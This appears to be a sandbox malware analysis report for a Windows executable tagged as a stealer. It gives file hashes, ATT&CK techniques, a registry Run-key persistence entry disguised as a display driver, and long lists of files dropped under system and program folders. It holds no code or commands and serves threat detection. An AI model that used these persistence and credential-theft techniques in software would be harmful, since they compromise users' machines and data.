fb68c68c00108c78502420c20ed5626ee4e8bb1741b795192d5a3f464dfb6658

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
28-04-2024 04:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
Size

13.3MB
MD5

045eb07a813c75105b31480ed74f5f4e
SHA1

d4f8283514e8acbd8aaa1cb6dff3aa126d24cd1e
SHA256

fb68c68c00108c78502420c20ed5626ee4e8bb1741b795192d5a3f464dfb6658
SHA512

c00ccbfb504d199e0f8059b71e89d28cd95b8e698c55a76e0abe0f62d52e785ae81510a27e28adac1ae3826022ef05b65a8a9971138009bcef2ca840745fec2d
SSDEEP

49152:XYgph7GBfWbYcMh2RAR5FeA6wAqC1xDkYOMwwnMb4PmyVAK:XX77GBfWb5uW1cYOXwnS4rVAK

Score

8^/10

discovery persistence spyware stealer

Malware Config

Signatures

Contacts a large (885) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@"	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe

Drops file in System32 directory 64 IoCs

Processes:

045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe

description	ioc	process
File created	C:\Windows\SysWOW64\taskmgr.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\tcmsetup.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\CertEnrollCtrl.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cttunesvr.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\takeown.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\driverquery.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Msdtc\Trace\msdtcvtr.bat	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\sdiagnhost.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\tcmsetup.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\verclsid.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\AtBroker.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\gpresult.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\iscsicli.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SearchProtocolHost.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\sfc.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\verifier.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\com_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\eventcreate.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mmc.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ROUTE.EXE_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ctfmon.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\DpiScaling.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\printui.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wecutil.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wusa.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\xpsrchvw.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\tzutil.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\DpiScaling.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\openfiles.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\regedit.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WSManHTTPConfig.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\netiougc.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\poqexec.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\autofmt.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\colorcpl.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\instnm.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\reg.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\tracerpt.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\autochk.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\gpresult.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\psr.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SearchFilterHost.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\vssadmin.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\bthudtask.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\System32\DriverStore\FileRepository\divacx64.inf_amd64_neutral_fa0f82f024789743\ditrace.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\fltMC.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\RpcPing.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\runas.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\format.com_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\instnm.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\isoburn.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SystemPropertiesHardware.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Bubbles.scr-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\EhStorAuthn.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\fltMC.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\reg.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\sxstrace.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\systeminfo.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wbem\WinMgmt.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\dccw.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\DpiScaling.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\regedit.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cscript.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe

Drops file in Program Files directory 64 IoCs

Processes:

045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe

description	ioc	process
File created	C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\7-Zip\7zFM.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Windows Media Player\wmprph.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\javaw.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Windows Mail\wab.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Windows NT\Accessories\wordpad.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Windows Sidebar\sidebar.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Internet Explorer\ielowutil.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\jp2launcher.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Games\Mahjong\Mahjong.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\SETLANG.EXE-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Windows NT\Accessories\wordpad.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\CNFNOT32.EXE-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Internet Explorer\iexplore.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Windows Media Player\wmpshare.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Updater.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\SCANPST.EXE	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\WORDICON.EXE_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Games\Solitaire\Solitaire.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\default-browser-agent.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Windows Defender\MSASCui.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.EXE	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\MSOUC.EXE-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\SCANPST.EXE-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Windows Media Player\wmpshare.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Internet Explorer\ieinstal.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.EXE_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\IEContentService.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\CNFNOT32.EXE_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\javaw.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\javaws.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\VideoLAN\VLC\uninstall.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\policytool.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Windows Sidebar\sidebar.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPREARM.EXE-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Windows Mail\wabmig.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe

Drops file in Windows directory 64 IoCs

Processes:

045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe

description	ioc	process
File created	C:\Windows\winsxs\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_6.1.7600.16385_none_9da1b3254ff796e9\sdchange.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_aspnet_regbrowsers_b03f5f7f11d50a3a_6.1.7600.16385_none_ddef5417d55eb944\aspnet_regbrowsers.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-m..-management-console_31bf3856ad364e35_6.1.7600.16385_none_0f49a133d6f5d42b\mmc.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-verclsid_31bf3856ad364e35_6.1.7600.16385_none_bbbd275974c7e191\verclsid.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-winre-recoverytools_31bf3856ad364e35_6.1.7600.16385_none_3142c61b8ada510f\ReAgentc.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_wcf-comsvcconfig_b03f5f7f11d50a3a_6.1.7601.17514_none_52db65a773b633fd\ComSvcConfig.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_wvmic.inf_31bf3856ad364e35_6.1.7601.17514_none_6007c443630c03aa\vmicsvc.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_6.1.7601.17514_none_c79aef32ab85d92b\cmmon32.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-displayswitch_31bf3856ad364e35_6.1.7600.16385_none_ec98071c85cf09eb\DisplaySwitch.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_aspnet_compiler_b03f5f7f11d50a3a_6.1.7600.16385_none_ed4e6c0f14dce27e\aspnet_compiler.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-d..-japanese-migration_31bf3856ad364e35_6.1.7600.16385_none_0e3c9ce5e73a7257\imjppdmg.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_6.1.7600.16385_none_3b3f55233d47d4f2\gpresult.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-d..frameworks-usermode_31bf3856ad364e35_6.1.7601.17514_none_fb3795fb0be32033\WUDFHost.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-security-tools-klist_31bf3856ad364e35_6.1.7600.16385_none_9d299157e03ce00f\klist.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-ie-setup-support_31bf3856ad364e35_8.0.7601.17514_none_3eb101caec1acc2c\ie4uinit.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-s..opertiesperformance_31bf3856ad364e35_6.1.7600.16385_none_b6cb9ed71c8b43d5\SystemPropertiesPerformance.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_6.1.7601.17514_none_73e472e09a1a05d1\wmpconfig.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_6.1.7601.17514_none_720e868d9b0b6a44\WerFault.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-ipconfig_31bf3856ad364e35_6.1.7600.16385_none_4c104723794237c2\ipconfig.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\notepad.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_addinprocess32_b77a5c561934e089_6.1.7601.17514_none_df35b5ac03866e22\AddInProcess32.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-snippingtool-app_31bf3856ad364e35_6.1.7600.16385_none_f5b8f3d6a353fa89\SnippingTool.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-sort_31bf3856ad364e35_6.1.7600.16385_none_07b314fa3333f10d\sort.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ComSvcConfig.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-commandlinehelp_31bf3856ad364e35_6.1.7600.16385_none_d4018bc76a8b37d9\help.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-u..ountcontrolsettings_31bf3856ad364e35_6.1.7601.17514_none_85ac7bd736dda285\UserAccountControlSettings.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_6.1.7600.16385_none_7cf343cac8a829ec\find.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-muicachebuilder_31bf3856ad364e35_6.1.7601.17514_none_1c140627131a6df3\mcbuilder.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-rpc-ping_31bf3856ad364e35_6.1.7600.16385_none_9d906433a20c1949\RpcPing.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\oisicon.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-setup-component_31bf3856ad364e35_6.1.7601.17514_none_905283bdc3e1d2d8\oobeldr.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-telnet-server-tlntsess_31bf3856ad364e35_6.1.7600.16385_none_05ebf19ca2304436\tlntsess.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_6.1.7600.16385_none_9da1b3254ff796e9\msra.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-wmi-core_31bf3856ad364e35_6.1.7601.17514_none_177a088436382a34\mofcomp.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_windowssearchengine_31bf3856ad364e35_7.0.7601.17514_none_d18028273214fa77\SearchIndexer.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-scripting_31bf3856ad364e35_6.1.7600.16385_none_aeb1ef0f4e6bba1d\cscript.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-f..opycompareutilities_31bf3856ad364e35_6.1.7600.16385_none_d9573758d681d8ec\diskcomp.com_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\msouc.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-msdt_31bf3856ad364e35_6.1.7600.16385_none_0177539a37378025\msdt.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-sort_31bf3856ad364e35_6.1.7600.16385_none_07b314fa3333f10d\sort.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_6.1.7601.17514_none_e8f86b1cdf02c483\wpnpinst.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_wvmic.inf_31bf3856ad364e35_6.1.7601.17514_none_6007c443630c03aa\vmicsvc.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-w..pdateclient-activex_31bf3856ad364e35_7.5.7601.17514_none_b9a4b88eb4255dbf\wuapp.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-convert_31bf3856ad364e35_6.1.7601.17514_none_9edcb4a706944d0a\autoconv.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\mcupdate\f30beba36940b5a2b55a32ea7f42d694\mcupdate.ni.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\ehome\loadmxf.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-ehome-ehmsas_31bf3856ad364e35_6.1.7600.16385_none_8707c620868fdf75\ehmsas.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-s..mpropertiesadvanced_31bf3856ad364e35_6.1.7600.16385_none_f71eddfb459a0155\SystemPropertiesAdvanced.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-taskscheduler-engine_31bf3856ad364e35_6.1.7601.17514_none_e7b3b71a1d1c8662\taskeng.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
